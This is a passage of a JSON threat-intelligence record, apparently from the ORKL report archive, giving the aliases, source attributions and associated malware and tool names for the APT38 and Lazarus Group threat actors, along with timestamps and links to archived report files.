			"aliases": [
				"APT38",
				"NICKEL GLADSTONE",
				"BeagleBoyz",
				"Bluenoroff",
				"Stardust Chollima",
				"Sapphire Sleet",
				"COPERNICIUM"
			],
			"source_name": "MITRE:APT38",
			"tools": [
				"ECCENTRICBANDWAGON",
				"HOPLIGHT",
				"Mimikatz",
				"KillDisk",
				"DarkComet"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "f32df445-9fb4-4234-99e0-3561f6498e4e",
			"created_at": "2022-10-25T16:07:23.756373Z",
			"updated_at": "2026-04-10T02:00:04.739611Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"APT-C-26",
				"ATK 3",
				"Appleworm",
				"Citrine Sleet",
				"DEV-0139",
				"Diamond Sleet",
				"G0032",
				"Gleaming Pisces",
				"Gods Apostles",
				"Gods Disciples",
				"Group 77",
				"Guardians of Peace",
				"Hastati Group",
				"Hidden Cobra",
				"ITG03",
				"Jade Sleet",
				"Labyrinth Chollima",
				"Lazarus Group",
				"NewRomanic Cyber Army Team",
				"Operation 99",
				"Operation AppleJeus",
				"Operation AppleJeus sequel",
				"Operation Blockbuster: Breach of Sony Pictures Entertainment",
				"Operation CryptoCore",
				"Operation Dream Job",
				"Operation Dream Magic",
				"Operation Flame",
				"Operation GhostSecret",
				"Operation In(ter)caption",
				"Operation LolZarus",
				"Operation Marstech Mayhem",
				"Operation No Pineapple!",
				"Operation North Star",
				"Operation Phantom Circuit",
				"Operation Sharpshooter",
				"Operation SyncHole",
				"Operation Ten Days of Rain / DarkSeoul",
				"Operation Troy",
				"SectorA01",
				"Slow Pisces",
				"TA404",
				"TraderTraitor",
				"UNC2970",
				"UNC4034",
				"UNC4736",
				"UNC4899",
				"UNC577",
				"Whois Hacking Team"
			],
			"source_name": "ETDA:Lazarus Group",
			"tools": [
				"3CX Backdoor",
				"3Rat Client",
				"3proxy",
				"AIRDRY",
				"ARTFULPIE",
				"ATMDtrack",
				"AlphaNC",
				"Alreay",
				"Andaratm",
				"AngryRebel",
				"AppleJeus",
				"Aryan",
				"AuditCred",
				"BADCALL",
				"BISTROMATH",
				"BLINDINGCAN",
				"BTC Changer",
				"BUFFETLINE",
				"BanSwift",
				"Bankshot",
				"Bitrep",
				"Bitsran",
				"BlindToad",
				"Bookcode",
				"BootWreck",
				"BottomLoader",
				"Brambul",
				"BravoNC",
				"Breut",
				"COLDCAT",
				"COPPERHEDGE",
				"CROWDEDFLOUNDER",
				"Castov",
				"CheeseTray",
				"CleanToad",
				"ClientTraficForwarder",
				"CollectionRAT",
				"Concealment Troy",
				"Contopee",
				"CookieTime",
				"Cyruslish",
				"DAVESHELL",
				"DBLL Dropper",
				"DLRAT",
				"DRATzarus",
				"DRATzarus RAT",
				"Dacls",
				"Dacls RAT",
				"DarkComet",
				"DarkKomet",
				"DeltaCharlie",
				"DeltaNC",
				"Dembr",
				"Destover",
				"DoublePulsar",
				"Dozer",
				"Dtrack",
				"Duuzer",
				"DyePack",
				"ECCENTRICBANDWAGON",
				"ELECTRICFISH",
				"Escad",
				"EternalBlue",
				"FALLCHILL",
				"FYNLOS",
				"FallChill RAT",
				"Farfli",
				"Fimlis",
				"FoggyBrass",
				"FudModule",
				"Fynloski",
				"Gh0st RAT",
				"Ghost RAT",
				"Gopuram",
				"HARDRAIN",
				"HIDDEN COBRA RAT/Worm",
				"HLOADER",
				"HOOKSHOT",
				"HOPLIGHT",
				"HOTCROISSANT",
				"HOTWAX",
				"HTTP Troy",
				"Hawup",
				"Hawup RAT",
				"Hermes",
				"HotCroissant",
				"HotelAlfa",
				"Hotwax",
				"HtDnDownLoader",
				"Http Dr0pper",
				"ICONICSTEALER",
				"Joanap",
				"Jokra",
				"KANDYKORN",
				"KEYMARBLE",
				"Kaos",
				"KillDisk",
				"KillMBR",
				"Koredos",
				"Krademok",
				"LIGHTSHIFT",
				"LIGHTSHOW",
				"LOLBAS",
				"LOLBins",
				"Lazarus",
				"LightlessCan",
				"Living off the Land",
				"MATA",
				"MBRkiller",
				"MagicRAT",
				"Manuscrypt",
				"Mimail",
				"Mimikatz",
				"Moudour",
				"Mydoom",
				"Mydoor",
				"Mytob",
				"NACHOCHEESE",
				"NachoCheese",
				"NestEgg",
				"NickelLoader",
				"NineRAT",
				"Novarg",
				"NukeSped",
				"OpBlockBuster",
				"PCRat",
				"PEBBLEDASH",
				"PLANKWALK",
				"POOLRAT",
				"PSLogger",
				"PhanDoor",
				"Plink",
				"PondRAT",
				"PowerBrace",
				"PowerRatankba",
				"PowerShell RAT",
				"PowerSpritz",
				"PowerTask",
				"Preft",
				"ProcDump",
				"Proxysvc",
				"PuTTY Link",
				"QUICKRIDE",
				"QUICKRIDE.POWER",
				"Quickcafe",
				"QuiteRAT",
				"R-C1",
				"ROptimizer",
				"Ratabanka",
				"RatabankaPOS",
				"Ratankba",
				"RatankbaPOS",
				"RawDisk",
				"RedShawl",
				"Rifdoor",
				"Rising Sun",
				"Romeo-CoreOne",
				"RomeoAlfa",
				"RomeoBravo",
				"RomeoCharlie",
				"RomeoCore",
				"RomeoDelta",
				"RomeoEcho",
				"RomeoFoxtrot",
				"RomeoGolf",
				"RomeoHotel",
				"RomeoMike",
				"RomeoNovember",
				"RomeoWhiskey",
				"Romeos",
				"RustBucket",
				"SHADYCAT",
				"SHARPKNOT",
				"SIGFLIP",
				"SIMPLESEA",
				"SLICKSHOES",
				"SORRYBRUTE",
				"SUDDENICON",
				"SUGARLOADER",
				"SheepRAT",
				"SierraAlfa",
				"SierraBravo",
				"SierraCharlie",
				"SierraJuliett-MikeOne",
				"SierraJuliett-MikeTwo",
				"SimpleTea",
				"SimplexTea",
				"SmallTiger",
				"Stunnel",
				"TAINTEDSCRIBE",
				"TAXHAUL",
				"TFlower",
				"TOUCHKEY",
				"TOUCHMOVE",
				"TOUCHSHIFT",
				"TOUCHSHOT",
				"TWOPENCE",
				"TYPEFRAME",
				"Tdrop",
				"Tdrop2",
				"ThreatNeedle",
				"Tiger RAT",
				"TigerRAT",
				"Trojan Manuscript",
				"Troy",
				"TroyRAT",
				"VEILEDSIGNAL",
				"VHD",
				"VHD Ransomware",
				"VIVACIOUSGIFT",
				"VSingle",
				"ValeforBeta",
				"Volgmer",
				"Vyveva",
				"W1_RAT",
				"Wana Decrypt0r",
				"WanaCry",
				"WanaCrypt",
				"WanaCrypt0r",
				"WannaCry",
				"WannaCrypt",
				"WannaCryptor",
				"WbBot",
				"Wcry",
				"Win32/KillDisk.NBB",
				"Win32/KillDisk.NBC",
				"Win32/KillDisk.NBD",
				"Win32/KillDisk.NBH",
				"Win32/KillDisk.NBI",
				"WinorDLL64",
				"Winsec",
				"WolfRAT",
				"Wormhole",
				"YamaBot",
				"Yort",
				"ZetaNile",
				"concealment_troy",
				"http_troy",
				"httpdr0pper",
				"httpdropper",
				"klovbot",
				"sRDI"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434513,
	"ts_updated_at": 1775826731,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/51123e82cb5de63c9bbba25e92276c0a26276a3e.pdf",
		"text": "https://archive.orkl.eu/51123e82cb5de63c9bbba25e92276c0a26276a3e.txt",
		"img": "https://archive.orkl.eu/51123e82cb5de63c9bbba25e92276c0a26276a3e.jpg"
	}
}